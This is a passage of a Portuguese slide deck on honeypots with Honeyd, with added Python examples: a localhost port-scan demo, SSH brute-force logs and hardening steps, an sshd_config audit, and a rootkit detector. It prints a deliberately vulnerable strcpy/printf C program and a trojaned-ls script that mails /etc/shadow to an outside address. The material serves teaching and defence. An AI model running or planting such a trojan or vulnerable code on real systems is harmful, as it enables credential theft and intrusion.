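    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                          # nothing listens there any more
    try:
        result = scan("127.0.0.1", [open_port, closed_port])
        return result[open_port], result[closed_port]
    finally:
        listener.close()


if __name__ == "__main__":
    print(demo())
```

A connect scan completes the handshake, so the target's service sees a real connection and logs it (a honeypot sees the S/E pair in honeyd.log); a SYN scan tears down after the SYN/ACK and is quieter, which is why nmap defaults to -sS when it has raw-socket privileges.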
  57. 57. Ataque For¸a bruta / Dicion´rios c a Explora¸˜o de vulnerabilidades ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  58. 58. SSH Porto 22 Atacado em For¸a bruta / Dicion´rios c a cat /var/log/auth.log Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  59. 59. SSH - log Dec 24 01:24:46 golden - laptop sshd [23906]: Invalid user oracle from 89.235.152.18 Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:24:48 golden - laptop sshd [23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2 Dec 24 01:24:49 golden - laptop sshd [23908]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Dec 24 01:26:01 golden - laptop sshd [23963]: Invalid user test from 89.235.152.18 Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:26:04 golden - laptop sshd [23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2 Dec 24 01:26:05 golden - laptop sshd [23965]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Dec 24 01:26:21 golden - laptop sshd [23975]: Invalid user cvsuser from 89.235.152.18 Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:26:22 golden - laptop sshd [23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2 Dec 24 01:26:24 golden - laptop sshd [23977]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! 
60. SSH
  Defence:
    IPTables
    stronger passwords
    RSA authentication
61. SSH
  passwords of at least 8 characters
  non-trivial passwords
  alphanumeric combinations
  mnemonic: “Um Whiskey-Cola vale 3 euros no BA!” (“A Whiskey-Cola costs 3 euros at the BA!”) = “UW-Cv3enBA!”
62. SSH
  http://www.passwordmeter.com/
63. SSH - RSA authentication
  1. Generate the key pair with the command “ssh-keygen -t rsa”. This creates the files ~/.ssh/id_rsa (private key) and ~/.ssh/id_rsa.pub (public key).
  2. On each machine we want to connect to (destination), place the generated “id_rsa.pub” in ~/.ssh/authorized_keys by appending its content, for example: “cat id_rsa.pub >> ~/.ssh/authorized_keys”
  3. On each machine we want to connect from (origin), place “id_rsa” in ~/.ssh/
  4. All that remains is to disable password-based login by adding the line “PasswordAuthentication no” to /etc/ssh/sshd_config and then restarting the “sshd” daemon with “/etc/init.d/sshd restart”.
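An added Python check, not part of the presentation, for verifying that step 4 really took effect: it reads sshd_config with sshd's first-occurrence-wins rule and flags password logins that a later Match block re-enables. The config fragments are constructed, and the defaults assumed for absent keywords are taken from sshd_config(5).

```python
# Values sshd uses when a keyword is absent (assumed from sshd_config(5)).
DEFAULTS = {"passwordauthentication": "yes", "pubkeyauthentication": "yes"}

def effective_settings(config_text):
    """Parse sshd_config text into {(keyword, scope): value}.
    sshd honours the FIRST occurrence of each keyword, and directives after a
    'Match' line apply only to matching connections until 'Match all'."""
    found = {}
    scope = "global"
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)          # "Keyword value" form assumed
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            scope = "global" if value.lower() == "all" else line
            continue
        found.setdefault((key, scope), value)
    return found

def audit_password_auth(config_text):
    """Return the list of problems that would defeat step 4 of the slide
    (an empty list means password logins are off and key logins are on)."""
    s = effective_settings(config_text)
    pw = s.get(("passwordauthentication", "global"), DEFAULTS["passwordauthentication"])
    pk = s.get(("pubkeyauthentication", "global"), DEFAULTS["pubkeyauthentication"])
    issues = []
    if pw.lower() != "no":
        issues.append("PasswordAuthentication is not 'no' (first occurrence wins)")
    if pk.lower() != "yes":
        issues.append("PubkeyAuthentication is disabled")
    for (key, scope), val in s.items():
        if key == "passwordauthentication" and scope != "global" and val.lower() == "yes":
            issues.append(f"password logins re-enabled under '{scope}'")
    return issues

# Constructed sshd_config fragments, not the slide's file.
GOOD_CONFIG = """\
PubkeyAuthentication yes
PasswordAuthentication no
"""
# Same intent, but the 'no' comes second (ignored) and a Match block re-enables it.
BAD_CONFIG = """\
PasswordAuthentication yes
PasswordAuthentication no
Match Address 192.0.2.0/24
    PasswordAuthentication yes
"""
```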
64. Vulnerabilities
  Unanticipated behaviour in a software artefact
  Buffer Overflow
  Unvalidated input
  SQL Injection
65. Exploitation of vulnerabilities
  Exploit
  The name given to a piece of code that exploits flaws in applications so as to cause behaviour in them that was not previously anticipated.

  #include <stdio.h>
  #include <string.h>

  int main(int argc, char *argv[]) {
      char buffer[10];
      if (argc < 2)
          return 1;                 /* no argument given: nothing to copy */
      strcpy(buffer, argv[1]);      /* no length check: overflows for inputs longer than 9 chars */
      printf(buffer);               /* user-controlled format string */
      return 0;
  }
66. Buffer Overflow
  user@honeypot:~$ gcc exploit.c -o exploit
  user@honeypot:~$ ./exploit thisisanexploit
  *** stack smashing detected ***: ./exploit terminated
  thisisanexploitAborted
  One of gcc's defence mechanisms
67. ShellCode
  A set of instructions (in machine code or not) developed so that they can be injected into an application at run time.
  Illegal access to unauthorised memory space
  Injection of the shellcode
68. RootKits
  Set of malicious programs (trojans, backdoors
  chkrootkit and rkhunter (Linux)¹; RootkitRevealer (Windows).
  ¹ Both available from Ubuntu's package manager.
69. Trojaned ls
  #!/bin/bash
  mv /bin/ls /bin/ls.old
  /bin/echo "cat /etc/shadow | mail intruso@intruso.pt" > /bin/ls
  /bin/echo "/bin/ls.old" >> /bin/ls
  chmod +x /bin/ls
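As an added example, not from the slides nor from chkrootkit or rkhunter, a Python check for the kind of substitution this script performs: it flags a system binary that is no longer an ELF image, whose hash differs from a recorded baseline, or that has a leftover “.old” sibling. The demo builds its own fake binary in a temporary directory and leaves the exfiltration line out of the wrapper it writes.

```python
import hashlib
import os
import tempfile

ELF_MAGIC = b"\x7fELF"

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def check_binary(path, expected_sha256=None):
    """Findings for one file that is supposed to be a native executable:
    not an ELF image (e.g. a shell script in its place), a hash that differs
    from the recorded baseline, or a '<name>.old' sibling like the one the
    slide's script leaves behind. An empty list means nothing suspicious."""
    findings = []
    with open(path, "rb") as f:
        head = f.read(4)
    if head != ELF_MAGIC:
        kind = "shell script" if head.startswith(b"#!") else "non-ELF file"
        findings.append(f"{path}: expected an ELF binary, found a {kind}")
    if expected_sha256 and sha256_of(path) != expected_sha256:
        findings.append(f"{path}: sha256 differs from the baseline")
    if os.path.exists(path + ".old"):
        findings.append(f"{path}.old exists: original may have been moved aside")
    return findings

def demo():
    """Constructed scenario in a temporary directory: record a baseline for a
    fake ELF 'ls', then swap it for a wrapper script the way the slide's
    trojan does (the exfiltration line is deliberately left out)."""
    with tempfile.TemporaryDirectory() as d:
        ls = os.path.join(d, "ls")
        with open(ls, "wb") as f:
            f.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 29)   # fake ELF header only
        baseline = sha256_of(ls)
        clean = check_binary(ls, baseline)                         # expected: []
        os.rename(ls, ls + ".old")                                 # mv ls ls.old
        with open(ls, "w") as f:
            f.write("#!/bin/bash\n" + ls + ".old\n")                # wrapper calling the original
        os.chmod(ls, 0o755)
        return clean, check_binary(ls, baseline)

if __name__ == "__main__":
    for finding in demo()[1]:
        print(finding)
```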
70. Conclusion